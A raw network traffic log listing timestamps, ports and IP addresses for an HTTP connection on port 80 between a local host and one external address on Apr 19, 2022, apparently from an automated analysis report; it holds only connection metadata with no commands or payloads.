Apr 19, 2022 16:44:44.332914114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.332952023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.333020926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333147049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333278894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333317041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.333363056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333400965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.333481073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333600044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333679914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333719015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.333800077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.333836079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.333961010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334038973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334184885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334223986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.334254026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334290981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.334377050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334517956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334638119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334676027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.334717989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334754944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.334840059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.334959030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335078001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335115910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.335160017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335196018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.335270882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335398912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335504055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335541010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.335630894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335757971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335796118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.335921049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.335956097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.335999966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336081028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336241007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336289883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.336359978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336400986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.336445093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336601973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336639881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336685896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.336762905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.336811066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.336883068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337044954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337140083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337207079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.337209940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337248087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.337330103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337485075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337572098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337635040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.337671995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337768078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.337827921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.337968111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338006973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338054895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.338202953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338248014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.338285923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338347912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338411093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.338485956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338570118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338696957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.338730097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338841915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338922024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.338964939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.339011908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339119911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.339180946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339322090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339401960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339445114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.339458942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339544058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.339601994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339723110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339852095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.339914083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.339963913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340006113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.340082884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340202093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340279102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340322971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.340441942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340480089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340482950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.340684891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340800047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340847969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.340883017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.340924025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.340959072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341082096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341231108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341274023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.341283083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341319084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.341404915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341562986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341672897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341716051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.341845036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.341886044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.341964006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.342248917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.342423916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.342468977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.342564106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.342607021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.342796087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343049049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343111038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.343337059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343449116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343525887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343579054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.343651056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343724966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343774080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.343889952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.343933105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.343952894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344089031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344207048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344250917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.344280958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344321012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.344443083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344523907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344683886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344726086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.344759941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344798088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.344923973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.344961882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345110893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345151901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.345266104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345304966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.345321894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345443010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345562935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345612049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.345658064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345700026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.345767975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.345927954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346064091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346121073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.346224070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346240997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346270084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.346368074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346404076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.346474886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346568108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.346620083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.346808910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347048044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347091913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.347167015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347292900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347366095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347404957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.347486973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347526073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.347606897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347728014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347848892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.347892046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.347966909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348047972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348086119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.348191023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348232031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.348268032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348412991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348489046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348535061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.348596096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348637104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.348728895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348850965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.348969936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349016905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.349088907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349143982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.349211931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349289894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349397898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349445105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.349518061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349556923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.349622011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349769115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.349843979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.349926949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350006104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350048065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.350078106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350208998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350250006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.350311041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350420952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350620031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350622892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.350732088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350805998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350825071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.350884914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.350922108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.351047039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351126909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351247072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351293087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.351366997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351408005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.351443052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351568937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351609945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.351655960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351824045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351924896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.351967096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.352004051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352037907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.352127075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352241993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352282047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.352366924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352485895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352526903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.352601051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352708101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.352756977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.352801085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.428823948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.428889990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.428947926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.428988934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429033995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429092884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429125071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429135084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429208040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429318905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429362059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429466963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429558039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429666996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429711103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429783106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.429826021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.429936886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430027008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430116892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430188894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.430272102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430322886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.430331945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430471897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430579901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430660963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.430684090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430727005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.430819035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.430897951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431026936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431076050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.431142092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431188107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.431277037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431433916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431492090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431499004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.431577921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.431665897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.431710005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435436010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435506105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435564041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.435729980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435771942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435827017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.435858011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.435895920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.436033010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436146975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436275959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436336040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436357975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.436391115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.436589003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436629057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436700106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436744928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.436846972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.436894894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.436961889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437036037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437242985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437293053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437309027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.437355995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.437386990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437479973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437649965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437716007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.437788963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437844038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.437844992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.437956095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438055992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438116074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.438261032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438301086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438309908 CEST	49758	80	192.168.2.4	45.135.48.153
